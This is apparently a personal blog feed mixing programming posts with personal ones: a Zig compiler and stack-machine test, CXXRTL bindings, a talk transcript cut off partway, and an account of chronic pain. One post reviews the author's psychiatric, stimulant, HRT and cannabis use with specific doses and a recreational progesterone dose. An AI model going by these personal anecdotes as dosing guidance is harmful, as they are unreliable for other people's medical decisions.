Training on the Africa Twin; I’ve been rebuilding confidence since a fall after a tyre replacement early last year, but I’d like some controlled conditions to push the envelope a bit.

StaleObjectStateException

2024-12-30T00:00:00Z

lottia notes continues

2024-12-24T00:00:00Z

A follow-up to lottia notes:

Charlotte continues to write there (though about more topics now, including Nix and Git/jj), and I’m considering her readership bootstrapped after a year of crossposts. Her Atom feed is linked.

Comptime, flow, and exhaustiveness

2024-12-17T10:02:36Z

Make your own exhaustiveness rules up.

1.2E+2 Volts (AC)

2024-12-15T00:00:00Z

edit: Google tells me people hit this page a lot, searching for “1.2e+2 volts” and “what does 1.2e+2 volts mean”. It means 120 volts — it’s written in scientific notation (1.2 × 10²), for absolutely no good reason.

Platform-specific hacks for high-DPI

2024-11-24T11:20:00Z

We need to avoid getting scaled by the compositor, to preserve our sharp edge.

Git and jujutsu: in miniature

2024-11-09T03:30:00Z

A concrete example of Git and jujutsu usage compared.

Soft skills: jujutsu early feelings

2024-11-07T06:55:00Z

Launching into jujutsu.

Non-intrusive vtable

2024-10-29T08:06:00Z

OOP is the world's most consistently-used term in any field of any kind, ever.

Reply to email, October 15

2024-10-29T00:00:00Z

The sender address bounced today, so I’m just publishing my reply here. Hope you see it! :)

Hiya <3

Thank you very much for your email; it was really lovely to receive. (Markdown ecosystem work is not very rewarding a lot of the time, lol :p)

But yeah — I don’t think there’s anything in particular you could do, and that’s quite OK! The thought by itself is enough, thank you :) Financially I’m completely fine. So I hope you get that Clojure gig and get money to make your own life even cooler! (Throwback to that time I wrote a Clojure impl in Ruby!)

Be well <3

Peak performance

2024-10-28T00:00:00Z

You may not like it, but this is what peak performance looks like.

Led

2024-10-13T07:13:00Z

Content note: pain, bad mental health, health issues.

Six months later, we’re back. It’s sad — we were acclimating well, met our neighbours, started riding all over the country, and then I started to be in pain.

Any kind of pain is bad, but the body part(s) affected really define the flavour of the impact it has, I guess, and this has been the first time I’ve had really significant leg pain. That’s sort of underselling it; it’s sometimes in my knees, usually ankles, feet, and though it seems like it shouldn’t be related, also in my elbows, fingertips, and even the sides of my neck, and it all feels very much related.

Still, for the most part it’s in my lower legs, and it. is. constant. I went back on nifedipine, since a Raynaud’s “diagnosis” last year had me try that and it sort of helped during winter. My hands and feet are always really cold, and they were worse than usual, so I was hopeful it’d help. Estonia only had the “medium acting” variant, and it felt a lot bumpier than the modified-release ones in Australia.

After that didn’t help at all, it was time to see the doctor. And see the doctor I did. And again, and again. And a physiotherapist. And an orthopaedist. Two X-rays, two different kinds of strong anti-inflammatory, three weeks of gabapentin, a month and a half of physio, and three months later in total and not even the slightest improvement. Exercising didn’t help, resting didn’t help. Ruled out referred back pain, inflammation, neuropathy, muscular.

Meanwhile, the time between appointments started to stretch out, I guess as folks returned from summer holidays, and I was just miserable. I hadn’t been able to do much of anything in a long time, and the healthcare system in Estonia was really making it hard. The pain on some days made me want to beat whichever leg was hurting into a pulp, because that somehow was more tractable and bearable.

So we’re back. I’ve had some relief since, in being able to switch back to the modified-release nifedipine, as well as get back on an antidepressant — duloxetine, both for the general sense of despair I’ve been accumulating this last quarter of a year (!), and for its help with ?fibromyalgia. The pain is a little bit more distant, but it’s still there and still getting worse.

Finally getting some blood tests confirmed it’s not something easy (anaemia, B12 deficiency) or obvious (cancer, RF+ RA). My money is on COVID-related vasculopathy, but I guess it’s not so easy to confirm, deny, or help. With some amazing luck, I managed to score an early rheumatologist appointment (someone had just cancelled), which then got bumped forward another week, so that’s now tomorrow.

I can’t particularly have my hopes up — we’re up to 4 months now since this started to intrude on my life. Last time I had a new chronic illness, it took more than a year for it to start subsiding regularly enough that I could start to believe it might abate entirely. (It came back for months at a time, years later.)

And unlike that time, this one isn’t only in my head: my legs and feet are increasingly randomly surfacing bruises that don’t clear up for months at a time. A few days ago while out to therapy, there was a particularly sharp ache across the top of my left foot, and when I got home, I took my shoe off and found that a vein had just turned completely black in a spot right there. There’s a blue patch on the back of my right leg (the one that hurts less on average!) that hasn’t gone away in the whole four months. And as my doctor here said, it’s entirely possible that at the end of all our investigations, I’ll still have this pain to manage, maybe indefinitely.

Which, y’know? That kind of thing just happens in life.

RSS autodiscovery

2024-10-13T00:00:00Z

It’s come to my attention that some folks don’t know my blog has an RSS feed! This is kind of astonishing to me as it suggests people actually manually check blogs for new posts sometimes?!

At any rate, it does, it’s just not linked anywhere explicitly — but it is supported via RSS autodiscovery, which I just kind of .. assumed everyone used, relied on, knew about? But apparently not!

I guess I’ll add a link, just in case. :)

Tüüpiautomaat: automated testing of a compiler and target against each other

2024-08-06T00:00:00Z

I’m currently working on a bit of a long-winded project to recapture QuickBASIC, the environment I learned to program in, in a bit of a novel way, while remaining highly faithful to the original. (I actually started a related project 9 years ago (!), and I’ll be able to reuse some of what I did back then!)

The new project involves compiling the BASIC down into a bytecode suitable for a stack machine, and an implementation of such a stack machine. Importantly, there’ll soon be a second implementation which runs on a different architecture entirely: namely, it’ll be an implementation of this architecture on an FPGA. So the machine needs to be reasonably easy to implement in hardware — if it simplifies the gateware design, I’ll happily take tradeoffs that involve making the compiler more complicated, or the ISA more verbose.

The ISA started out with opcodes like:

pub const Opcode = enum(u8) {
    PUSH_IMM_INTEGER = 0x01,
    PUSH_IMM_LONG = 0x02,
    PUSH_IMM_SINGLE = 0x03,
    PUSH_IMM_DOUBLE = 0x04,
    PUSH_IMM_STRING = 0x05,
    PUSH_VARIABLE = 0x0a,
    // [...]
    OPERATOR_ADD = 0xd0,
    OPERATOR_MULTIPLY = 0xd1,
    OPERATOR_NEGATE = 0xd2,
    // [...]
};

For the binary operations, the stack machine would pop off two elements, and then look at the types of those elements to determine how to add them. This is easy to do in Zig, but this is giving our core a lot of work to do — especially when we consider how extensive the rules involved are:

Ideally, the executing machine doesn’t ever need to check the type of a value on the stack before doing something with it — the bytecode itself can describe whatever needs to happen instead.

In other words, when compiling this¹:

a% = 42       ' This is an INTEGER (-32768..32767).
b& = 32800    ' This is a LONG (-2147483648..2147483647).
c% = b& - a%  ' This should result in c% = 32758.  A smaller a% would result in overflow.

… instead of having an op stream like this:

PUSH_IMM_INTEGER(42)
LET(0)
PUSH_IMM_LONG(32800)
LET(1)
PUSH_VARIABLE(1)
PUSH_VARIABLE(0)
OPERATOR_SUBTRACT     // runtime determines it must promote RHS and do LONG subtraction
CAST_INTEGER          // runtime determines it has a LONG to demote
LET(2)

— and so leaving the runtime environment to decide when to promote, or demote, or coerce, and when to worry about under/overflow — we instead have this:

PUSH_IMM_INTEGER(42)
LET(0)
PUSH_IMM_LONG(32800)
LET(1)
PUSH_VARIABLE(1)
PUSH_VARIABLE(0)
PROMOTE_INTEGER_LONG     // compiler knows we're about to do LONG subtraction
OPERATOR_SUBTRACT_LONG
COERCE_LONG_INTEGER      // compiler knows we're assigning to an INTEGER
LET(2)

A proliferation of opcodes results, but crucially it means most operations execute unconditionally, resulting in a far simpler design when it comes to putting this on a chip.

The upshot of this design, however, is that the compiler needs a far greater degree of awareness and ability:

It needs to be aware of what types the arguments to the binary operation are.

In the example above, we have a LONG and an INTEGER. This appears trivial, but we need to keep in mind that the arguments can be arbitrary expressions.

We need this in order to determine the opcode that gets emitted for the operation, and to know if any operand reconciliation is necessary.
It needs to be able to reconcile different types of operands, where necessary.

BASIC’s rules here are simple: we coerce the lesser-precision value to the greater precision. In effect the rule is INTEGER < LONG < SINGLE < DOUBLE.

STRING is not compatible with any other type — there’s no “x” * 3 = “xxx” here.
It needs to be aware of what type a binary operation’s result will be in.

I started out with the simple rule that the result will be of the same type of the (reconciled) operands. This worked fine when I just had addition, subtraction and multiplication; above, we add a LONG and an INTEGER, the INTEGER gets promoted to a LONG, and the result is a LONG.

Division broke this assumption, and resulted in the motivation for this write-up.
It needs to be able to pass that information up the compilation stack.

Having calculated the result is a LONG, we need to return that information to the procedure that compiled this expression, as it may make decisions based on what’s left on the stack after evaluating it — such as in the first dot-point here, or when assigning to a variable (which may be of any type, and so require a specific coercion).

This all kind of Just Worked, right up until I implemented division. I discovered QuickBASIC actually has floating and integer division! Young me was not aware of the backslash “\” operator (or any need for it, I suppose). Floating division always returns a floating-point number, even when the inputs are integral. Integer division always returns an integral, even when the inputs are floating. The precision of the types returned in turn depends on that of the input types.

operands	fdiv “`/`”	idiv “`\`”
INTEGER	SINGLE	INTEGER
LONG	DOUBLE	LONG
SINGLE	SINGLE	INTEGER
DOUBLE	DOUBLE	LONG

Output types of each division operation given (reconciled) input type.

This presented a problem for the existing compiler, which assumed the result would be the same type of the operands: having divided two INTEGERs, for example, the bytecode emitted assumed there would be an INTEGER left on the stack, and so further emitted code would carry that assumption.

Upon realising how division was supposed to work, the first place I made the change was in the actual stack machine: correct the behaviour by performing floating division when floating division was asked for, regardless of the operand type. Thus dividing two INTEGERs pushed a SINGLE. The (Zig) machine then promptly asserted upon hitting any operation on that value at all, expecting an INTEGER there instead. (The future gateware implementation would probably not assert, and instead produce confusing garbage.)

And so opened up a new kind of bug to look out for: a mismatch between (a) the assumptions made by the compiler about the effects on the stack of the operations it was emitting, and (b) the actual effects on the stack produced by those operations running on the stack machine.

Rather than just some isolated tests (though short of creating some whole contract interface between compiler and machine — maybe later), why not be thorough while using the best witness for behaviour there is? Namely, the compiler and stack machine themselves:

test "compiler and stack machine agree on binop expression types" {
    for (std.meta.tags(Expr.Op)) |op| {
        for (std.meta.tags(ty.Type)) |tyLhs| {
            for (std.meta.tags(ty.Type)) |tyRhs| {
                var c = try Compiler.init(testing.allocator, null);
                defer c.deinit();

                const compilerTy = c.compileExpr(.{ .binop = .{
                    .lhs = &Expr.init(Expr.Payload.oneImm(tyLhs), .{}),
                    .op = loc.WithRange(Expr.Op).init(op, .{}),
                    .rhs = &Expr.init(Expr.Payload.oneImm(tyRhs), .{}),
                } }) catch |err| switch (err) {
                    Error.TypeMismatch => continue, // keelatud eine
                    else => return err,
                };

                var m = stack.Machine(stack.TestEffects).init(
                    testing.allocator,
                    try stack.TestEffects.init(),
                    null,
                );
                defer m.deinit();

                const code = try c.buf.toOwnedSlice(testing.allocator);
                defer testing.allocator.free(code);

                try m.run(code);

                try testing.expectEqual(1, m.stack.items.len);
                try testing.expectEqual(m.stack.items[0].type(), compilerTy);
            }
        }
    }
}

We go as follows:

For all binary operations, enumerate all permutations of left- and right-hand side types.
For each such triple, try compiling the binary operation with the “one”-value² of each type as its operands. (For integrals, it’s literally the number one.)
- If we get a type error from this attempt, skip it — we don’t care that we can’t divide a DOUBLE by a STRING, or whatever.
- If not, the compileExpr method returns to us the type of what it believes the result to be. This is the same information used elsewhere in the compiler to guide opcode and coercion decisions.
Create a stack machine, and run the compiled code.
- Seeing as we didn’t actually compile a full statement, we expect the result of the operation to be left sitting on the stack. (Normally a statement would ultimately consume what’s been pushed.)
Assert that the type of the runtime value left on the stack is the same as what the compiler expects!

I love how much this solution takes care of itself. While it lacks the self-descriptive power of a more coupled approach to designing the compiler and runtime, it lets the implementations remain quite clear and straightforward to read. It also lets them stand alone, which is handy when a second implementation of the runtime part is forthcoming, and is (by necessity) in a completely different language environment.

There was greater value than just from floats, of course: relational operators like equal “=”, not equal “<>”, etc. all return INTEGERs 0 or -1, but can operate with any combination of numeric types, or with pairs of STRINGs. Bitwise operators like AND, OR, XOR, IMP (!), etc. can operate with any combination of numeric types, but coerce any floats to integrals before doing so. I bet there’ll be more to uncover, too.

Hope this was fun to read!

I will get some real BASIC highlighting up here by the next post on this! ↩
I first used each type’s zero value, but then we get division by zero errors while trying to execute the code! ↩

Kalakarp

2024-07-27T00:00:00Z

Feeling very seen by fish today.

Ravimid

2024-07-26T00:00:00Z

Reviewing all the medications I’ve ever been on. This will be intensely specific to my experiences; YMMV! Content note: mentions of mental illness, suicidal feelings, assault, sex.

mental health(-ish)

escitalopram
- A day or two after starting it I felt like the world had colour in it again for the first time.
- Not very effective for anything other than “light depression” (?) imo.
- Prescribed initially for depression/I’m 23 And Life Is Generally Hard, was on it for two years.
- Later prescribed in an attempt to counter chronic idiopathic nausea, to no effect.
quetiapine
- Wow! I didn’t know what “suicidal compulsion” actually felt like until I took my first dose. That was also my last dose.
desvenlafaxine
- Going up from 100mg to 200mg, I’d just stop knowing how to form sentences halfway through them.
- Effective on moderate GAD-type symptoms.
- Coming off it was, contrary to all expectations, pretty uneventful. Except that for about three weeks, all I could smell was blood, with no apparent source.
brexpiprazole
- If you close your eyes, you will fall asleep. At any time.
- Definitely calm.
- Much too sleepy to continue, but it definitely brought me down after increasingly intensifying distress post-sexual assault.
- As with any antipsychotic/dopamine antagonist, not particularly inclined to remain on one for any longer period of time.
- At the time I was put on it, the only article in the literature about it had the (actually!) reassuring title: “Brexpiprazole: so far so good”.
lamotrigine
- Unclear whether I felt much of anything on this, even after three years at 200mg.
- Coming off it: ANGER. Wow. (Remember to titrate; SJS can be triggered both on increase and decrease, apparently.)
- After coming off it: oh my goodness I suddenly feel like being creative again.
mirtazapine
- eeeeeeeepy and hunnnnggggy.
- Extremely and rapidly effective with chronic idiopathic nausea. Nothing else worked.
- Weight gain pretty woof. That said, the weight I gained on it, I managed to drop while still on it.
- I don’t remember if I maxed out at 30mg or 45mg — at higher doses the dissociation made memory very wonky.
- Discontinuation meant a lot of rebound nausea and anxiety. It took me about 4 attempts, over several years, with various titration schedules; the successful attempt was just dropping from a sustained 15mg to 0. Trying to step it down at 7.5mg only prolonged the unpleasantness and resulted in aborting the attempt — subtherapeutic but side-effects remain.
duloxetine
- Really pleasant and noticeable, even at 30mg. Everything feels a bit lighter, and mild neuropathy totally neutralised.
- Night sweats :( Became intolerable not long after increasing to 60mg, and didn’t subside after reducing again.
- Discontinuation was reasonably uneventful; (manageably) shorterer temper and very mild nausea.
gabapentin
- I just started this! Early effects for neuropathy are promising. Slightly dissociative/floaty.
- Was always curious about gabapentin/pregabalin since I first started having noticeable anxiety, so I’m glad I’ve gotten to try it. Definitely somewhat calming.
diazepam
- It is what it is.
- Avoid taking on an empty stomach if you’re having issues with nausea — it can get so much worse.
- I treat it with extreme caution. I’ve read so many personal horror stories about benzodiazepine dependence and it takes a really bad time for me to consider taking even 2.5mg. I’ll go up to 5mg if need be, but in general would refuse to take it if I’ve had any separate dose within the last week.
- For the above reason, despite having been in some very bad places (where doctors were prescribing it in larger quantities at a time), I’ve maybe taken 100mg total over the last decade. Just not worth the risk.
- Even less inclined to if I’ve taken stimulants on the same day, but I’ve only ever once (namely, in a life-threatening situation) had to even consider diazepam since getting medicated for ADHD 2 years ago. Funny how that works!
temazepam
- Not a fan; taken a handful of times ever, mostly at music festivals.
- I have chronic insomnia and this is just not any part of an answer to it.

ADHD

dextroamphetamine
- Current weapon of choice. Calm, alert, focussed.
- Latent anxiety is reduced a lot, probably because it lets me have some agency in my own head.
- My doctor gradually increased my dose to 10mg, 4 times a day. This is absolutely fucking nuts. Don’t do that.
- After 1.5 years I’ve settled on 2.5mg, twice a day at a 4 hour interval, and it’s completely adequate.
- If I’m having a very long day, a third dose is fine too. 2.5mg doses are very light.
- For a long while there I was finding myself increasing my dose by 2.5mg or 5mg (per day) every week or so since the tolerance builds so rapidly. You will deplete every last monoamine you have like this. I managed to tolerate 40mg/day (after a buildup) for about two days before I crashed. Do Not.
- Sometimes 2.5mg doses can feel a little bit too light, but my health right now is such that increasing even just one of the doses leaves me feeling empty the next day. I’m glad to have something that works.
- Small doses is also good because I’ve yet to see a psychiatrist in Estonia to get a prescription here, so I’m working through my stock from Australia very slowly. As far as I can tell, currently authorised dextroamphetamine products haven’t been imported to Estonia, so it’s unclear how easy it’d be to access it.
- There’s this one, but it’s only available in 10mg? And searching for it online shows up something with the same name, but it’s atomoxetine instead? Very suss on that.
lisdexamfetamine
- Hrrrrrrr. Not a fan.
- Something about this leaves me feeling depleted at any effective dose. I think I like the little humps I get between dex doses — lisdex is just exhausting, and an absolute pain if you wake up late.
- 30mg? Not enough to feel anything — too spread out.
- 40mg? I kinda feel something. It’s a bit eh.
- 50mg? Yeah, okay, maybe this starts to feel like I’m having an OK dose of dex — I can think, focus, actually listen to people when they talk to me. I feel like I am spread very thin.
- 60–70mg? Effective — wired — but also I start sleeping longer and longer because of how exhausted it leaves me, making my doses later and later, in turn fucking up my sleep schedule; not to mention the pervasive sense of Bad that starts to accumulate. No ty.
- My god. I tried combining ~low dose lisdex with a small dex booster in the afternoon. Quick way to know what it feels like to fry your brain. You can do all the stimulant equivalence arithmetic you want, it just doesn’t add up that way.
- If I was offered lisdex or nothing, it’s not clear to me that I would take it.
- In general, I’m not sold on long-acting stimulants. I get the abuse angle (it’s what I was put on first, for this reason), and I do read stories of folks who find it legitimately helpful — like most others with ADHD, I regularly forget to take my stimulants — but there was no way to make it work for me. It’s too inflexible, and there’s some (possibly fear-mongering) news out there that suggests long-acting stimulants carry a greater risk of psychosis than short-acting ones?
methylphenidate
- Very conflicted on this. (Annoying that it’s so much more readily available, especially in Europe.)
- Possibly neuroprotective vs. an active COVID infection! I was on MPH when I finally got COVID, and was wondering if I should keep taking stimulants through a moderately bad case of it or not. This article swayed me in favour of maintaining it:
  
  Remarkably, several drugs acting on receptors to neurotransmitters also appear to decrease hospitalization risk: rizatriptan (OR=0.118, CI 0.003 to 0.750), bupropion (OR=0.399, CI 0.136 to 0.976), and methylphenidate (OR=0.444, CI 0.178 to 0.972).
  
  I’ll take an OR of 0.444ish. I had to argue with a doctor from the government(!) to avoid hospitalisation, but avoid it I did.
- I haven’t gotten a sense for how shared this is, but I get noticeable euphoria when starting on 10mg, and it makes one very inclined to up the dose when you stop getting that response after a few days.
- Dragon-chasing aside, MPH consistently produces a sort of global “bad” sensation that I just cannot with. Even with the initial euphoria, it’s still noticeable — there’s just this unpleasant but persistent background qualia, almost a certain flavour of experience. Unclear if shared or just me.
- All that notwithstanding, from 10mg it feels 70–80% as effective as dex at ~equivalent dose (5mg dex ≈ 10mg MPH).
- 5mg didn’t feel like it had any impact at all, but that was a while ago, and I’d revisit it if I had to.
- If I was offered MPH or nothing, I would probably take it.
- If I was offered MPH or lisdex, I would probably take MPH.

vascular

propranolol
- Very chill. Noticeable sensation in the chest.
- I once had a kind of shock reaction to a piercing which resulted in a really high heart rate, intense and sudden nausea, cold shivers all over, and me on the floor. (I find lying on a cold hard floor fixes most things.) The next time I went for a piercing I took 10mg propranolol before and it was easy.
- Initially prescribed to try to combat panic disorder/idiopathic nausea. It at least brought my heart rate down and made it possible to eat again.
- Later took it for arrythmia on demand. Reasonable at this — would often get painful(!) arrythmia at night which would make sleep impossible, and leave me feeling sore (and exhausted) the whole next day. 10mg propranolol would usually convert it within half an hour.
- 100–200mg magnesium seems to work for that too.
nifedipine
- Certainly feel that one on starting. Not like I didn’t already have some orthostatic hypotension …
- Take for Raynaud’s in the Australian winter/unspecified (micro?)vascular issues. Recently my legs have been feeling Not OK and so I’ve restarted it. Unfortunately, we don’t seem to have the modified-release ones here, so I have to dose twice a day.
- Doesn’t impair exercise.
- Not to be combined with propranolol (or magnesium, possibly).

gastric

esomeprazole/omeprazole
- Unremarkable. Not super effective for (probably stress-induced) heartburn/reflux.
- Was also prescribed it at one point as an attempt to help with idiopathic nausea — no response.
ondansetron
- This is meant to be the Big Guns when it comes to nausea, and it did nothing for mine.
- I was scrambling to find something that would work — it’d slowly subsided on desvenlafaxine in the first instance, and I’d tapered off that after about a year and was all good. A particularly bad anxiety attack provoked it into a full reoccurrence, which was terrifying. I wasn’t inclined to retry stepping up on desvenlafaxine and waiting it out to see if it’d work again — I felt like it might’ve also just been a matter of time, then, as it remitted only after more than a year of (essentially constant) suffering! — so I looked for other things.
- My research lead me to mirtazapine; there’s a number of different ways in which it’s antiemetic. My GP at the time was happy to prescribe it for me based on my conviction, but wanted to try ondansetron first to see if it’d work as a circuit breaker (and thus avoid necessitating something taken over a longer time). Alas.

cannabidiol

Usual effects of cannabis products apply.

THC oil
- First trials found it to be extremely intense and disorienting.
- Retrying years later (once I was using flower more medicinally and regularly), found it to be a nice way to dose THC in a more controlled manner, without the usual associations that come with vaping bud (i.e. “Time To Relax, And Perhaps Eat Much Šokolaadi.”)
- Slower onset can be quite pleasant.
CBD oil
- First trials found it to make me feel generally unwell!
- Later trials together with THC oil found it to be a nice way to dampen some aspects of the THC high, if needed.
cannabis flower
- Nothing much to report here. Australian medicinal cannabis was decent, actually decent value (per volume), and there was a reasonable variety of strains to choose from, which improved over the years. Doctors were not inclined to gatekeep (perhaps concerningly so) or judge.
- Driving was a bit nerve-wracking; regular use builds up a level in the blood which can be detected by roadside random breath tests even if you’ve not used any that day, so I was pretty much always on alert/police-avoidance mode. It was a pretty strong deterrent, but I lived in a public transport deadzone so there wasn’t much choice.
- This may be changing soon in Victoria!

misc

naproxen
- Prescribed for leg pain which was suspected referred back pain.
- Came in a combination form with esomeprazole because COX inhibitors be wild.
- No effect.
tadalafil/sildenafil
- Mildly effective for antiandrogen-related difficulties with penetrative sex.
- Not a fan of the way these make my heart feel; wouldn’t opt for tadalafil again since it’s just the same but for days instead of hours.
emtricitabine+tenofovir
- PrEP. This is important, good stuff!
- Mild nausea during the first two weeks of starting it, otherwise side-effect-free.
- Been on and off it a half-dozen times over the last 8 years as my risk factors have increased or decreased. I have nothing but good things to say about PrEP.
- Caution while travelling; less progressive governments may infer any number of things about you based on the medication you carry.

HRT

oestradiol valerate
- Standard first-line transfem primary HRT.
- In the first few years I seemed to manage decent levels while increasing to 8mg/day, but over time I seemed to stop being able to absorb oral oestrogen and had to switch off.
- Not particularly sad about that: other forms are less work for my liver.
oestradiol gel
- Absorbs well. A little bit annoying to make your skin sticky twice a day but wycd ¯\_(ツ)_/¯
- Seems to be widely available; the last few years have had many HRT shortages, but I’ve not had issues with this.
micronised progesterone
- Preferred over synthetics (e.g. levonorgestrel) due to much reduced blood clotting risk, fewer negative mood side-effects.
- Helpful for sleep — take at night.
- First time I started it, within days I was sobbing (+) while watching Frozen. Really unlocks some emotions.
- 200-300mg is an actual recreational high (N.B.! loss of consciousness/respiratory depression may result at extreme doses).
- Also an antiandrogen!
spironolactone
- At least in Australia, first-line antiandrogen.
- Diuretic and generally not fun. At the doses required for me, also precipitated pretty intense low mood which abated upon discontinuation.
cyproterone
- Antiandrogen. Extremely effective in even tiny doses.
- My doctor started me on 50mg a day. I don’t have a good analogy for how nuclear this is.
- May need more initially to get levels down, but (depending on prevailing E levels) you may be fine with 12.5 mg once a week, i.e. 3.6% of the dose I was started on.
- Some folks report low mood on cypro; it hasn’t been an issue for me.

VyxOS

2024-07-19T00:00:00Z

Nix configuration revealed!

Sada päeva

2024-07-18T00:00:00Z

Yesterday was our 100th day in Estonia. Taking a little bit of stock of what we’ve managed:

Visited the 4 largest cities in the country.
Rented an apartment in the biggest one!
Furnished what the apartment didn’t come with.
Shipped our things from Australia. (Maybe a month off those arriving.)
Got our motorcycles; put 900km on each.
Got medium-term visa for A, and long-term one applied for.
Got our medications prescribed locally.
Financial/bureaucratic overhead.
Changed my name and got new ID.
Got onto a good family doctor’s list.
Kept in touch with families and psychologists.
Vaccinations.
Saw the border.
Went to a cat café.
Went to sauna.
Concluded jaanipäev with clothes smelling deeply of bonfire.
Went to a live show (Estonian).
Went to a live show (non-Estonian).
Walked about 500km.
Taken a lot of public transport.
Met a range of people.
Spoken quite a bit of Estonian.
Kept up with projects.
Finished a diary!
Grew a lot.

Activity period

2024-07-09T00:00:00Z

Time travel

2024-07-06T00:00:00Z

The typical hypothetical “who are you coding for” example meant to shock you into writing better code is “yourself in six months”, but it turns out four is completely adequate to get lost.

Python still surprises

2024-06-27T00:00:00Z

After the better part of 20 years working with Python, it still managed to surprise me today.

I’m so used to languages treating x += y et al. as pure sugar for x = x + y that it skipped my mind that some don’t.

I’m not surprised that you can override them separately in some languages (e.g. I simply assume this to be the case in C++, and on checking it turns out to be true — but that seems fair enough given the scope of the language), but I really am so accustomed to them being only sugar in Ruby that I assumed the same would hold, at least in effect, in Python.

Thus my surprise on some_list += x modifying some_list in place (unlike some_list = some_list + x), but once observed, I realised there’d be a separately-overridden operator function — namely __iadd__ — and so I figured it “had” to be that way.

Or did it? I then found myself assuming it’s because these operators can’t actually reassign the receiver, but in fact they can and do: the return value is what’s assigned to the LHS. So it’s just a matter of convention.

sint

2024-06-22T00:00:00Z

Notes.app, kell 08:03:

my new theory is that satan Crept into this world through signed integers

zxxrtl

2024-06-17T00:00:00Z

I’ve been getting back into using CXXRTL and Zig together, so I’ve extracted and rendered somewhat reusable the bindings I made to use them together!

zxxrtl uses CXXRTL’s C API to provide a somewhat idiomatic way to access, manipulate, and respond to events happening in the design. Its README covers the setup — it’s a bit involved as it’s necessarily something of a build system, but once you’re done it’s good to go and flexible enough to be instrumented from a higher build system.

I’m going to paste the example usage here; this doesn’t use the Sample API for edge detection, and just drives the simulation while optionally recording VCD:

const Cxxrtl = @import("zxxrtl");

// Initialise the design.
const cxxrtl = Cxxrtl.init();

// Optionally start recording VCD. Assume `vcd_out` is `?[]const u8` representing an
// optional output filename.
var vcd: ?Cxxrtl.Vcd = null;
if (vcd_out != null) vcd = Cxxrtl.Vcd.init(cxxrtl);

defer {
    if (vcd) |*vcdh| vcdh.deinit();
    cxxrtl.deinit();
}

// Get handles to the clock and reset lines.
const clk = cxxrtl.get(bool, "clk");
const rst = cxxrtl.get(bool, "rst");  // These are of type `Cxxrtl.Object(bool)`.

// Reset for a tick.
rst.next(true);

clk.next(false);
cxxrtl.step();
if (vcd) |*vcdh| vcdh.sample();

clk.next(true);
cxxrtl.step();
if (vcd) |*vcdh| vcdh.sample();

rst.next(false);

// Play out 10 cycles.
for (0..10) |_| {
    clk.next(false);
    cxxrtl.step();
    if (vcd) |*vcdh| vcdh.sample();

    clk.next(true);
    cxxrtl.step();
    if (vcd) |*vcdh| vcdh.sample();
}

if (vcd) |*vcdh| {
    // Assume `alloc` exists.
    const buffer = try vcdh.read(alloc);
    defer alloc.free(buffer);

    var file = try std.fs.cwd().createFile(vcd_out.?, .{});
    defer file.close();

    try file.writeAll(buffer);
}

Hopefully this is useful to someone else!

fren

2024-06-13T00:00:00Z

Täna

2024-06-06T00:00:00Z

Täna oli saunapäev. ^_^

Chisel and C++, recorded at last

2024-05-29T00:00:00Z

Yay! Here’s the recording for Chisel and C++, together at last.

Chisel and C++, together at last

2024-05-28T00:00:00Z

I gave a lightning talk at last night’s Yosys Users Group about combining Chisel and C++ with Yosys/CXXRTL. ~~I think there’ll be a recording of them that goes up on YouTube eventually?~~

Here’s my slides; the transcript follows.

Hi folks! I’m kivikakk, and I’m here to talk about connecting Chisel and C++, leaning on Yosys for all the hard work.

In the workplace I’m a “systems engineer”, which usually means weaving together low- and high- level languages in dark ways; think writing Erlang C nodes, combining Ruby, Go and C++, that kind of thing.

In open source, I’m regrettably best-known for my work with Markdown. I have zero electrical or digital background — or formal education — but after microcontrollers failed to capture my interest, FPGAs succeeded, and I started exploring in earnest last year.

Now, this is something I do for fun, which meant Verilog and VHDL were completely capable of turning me off this path forever. I’m really into programming language theory and design, and uh, well, Verilog sure could’ve used some of either. I found Amaranth (formerly nMigen) pretty quickly, and so I started hacking on Yosys too. I’ve particularly enjoyed working on CXXRTL, which is the focus of this talk. I spent about 9 months learning with Amaranth, but—

I’m still this dog, and there are more perspectives out there.

I decided to learn Chisel, which is an HDL in Scala like Amaranth is an HDL in Python. These aren’t high-level synthesis tools, you still describe hardware in them, just using DSLs embedded in a regular programming language.

You write code which generates hardware, in a metaprogramming kind of way, except the metaprogramming is regular programming and the programming is circuit definition instead. You run your code,

and out pops something that can go into your toolchain’s frontend. Chisel outputs SystemVerilog, and is easily configured to avoid constructs Yosys doesn’t like.

So we have our Verilog, and we feed it into Yosys.

Using the rest of the suite, we can synthesise for iCE40, ECP5 and more, but we can also target C++!

Yosys has its own C++ backend, CXXRTL. It’s similar to Verilator, but has some unique advantages. For starters, if you’re using Yosys anyway, we can avoid adding another tool. Moreover, the C++ comes directly from Yosys’ internal RTL model — you can perform transforms and optimisations and then generate the simulation without a Verilog roundtrip. It also supports runtime introspection of the design, as well as exposing its API to C. This makes it feasible to use the generated simulations from any language with C FFI, like Rust or Zig.

One of the most fun parts, though, is the ability to instantiate blackboxes anywhere in your hierarchy, which you implement in C++. I’m going to show you real fast what that can look like.

Here’s a tiny stack machine. It knows how to read and write bytes on UART, some trivial stack manipulation, and how to jump back to zero. The implementation itself isn’t very challenging, but the important part is that it gets its instructions from a synchronous memory.

For unit tests in Chisel, I instantiate a vector like a ROM, and implement the other side side of the read port, making sure to return data in the right cycle. So far so good.

Let’s initialise our instruction memory from SPI flash. The iCEBreaker I’m using as a dev board puts its bitstream on one, and there’s plenty of room left for user data. So I flash my little “ROM” into the upper half, and on reset the gateware’s SPI reader module populates the memory from it before starting the stack machine.

What about our C++ simulation? We have a few options that are more interesting than “ignore the flash reader”:

A, we can do like we did with the static memory and emulate the SPI flash in gateware, and put that into the design when elaborating for CXXRTL.

This approach is fine for simple external interfaces, but for more complex ones, such an implementation may not be feasible, and writing gateware for sim means writing testbenches for your sim gateware. It’s also going to run as slow as any other logic.

B, we can emulate the SPI flash in C++ by watching the top-level output pins and toggling input pins as necessary. This is straight-forward, though it means you have to co-simulate your peripheral at the same time as stepping the design.

C, we can drop a blackbox into the design, and hook up the SPI reader module to the blackbox instead of external IO. Then, we implement the blackbox internals in C++.

This is where CXXRTL’s blackbox support comes in: you give it a module interface definition, and it generates a C++ class for it the same way it would for any other non-flattened module in your design. Then you subclass it, implementing logic internal to the blackbox in C++, reacting to events at the simulation step level, without having to rewrite your whole simulation driver into an event loop.

This is super powerful, and it’s a lot easier to implement a peripheral in full-blown C++ than it is in gateware.

Now, I tend to call this approach a “whitebox” implementation, to contrast with—

D, take the SPI reader out of the design, and drop in a blackbox which emulates the reader’s interface instead.

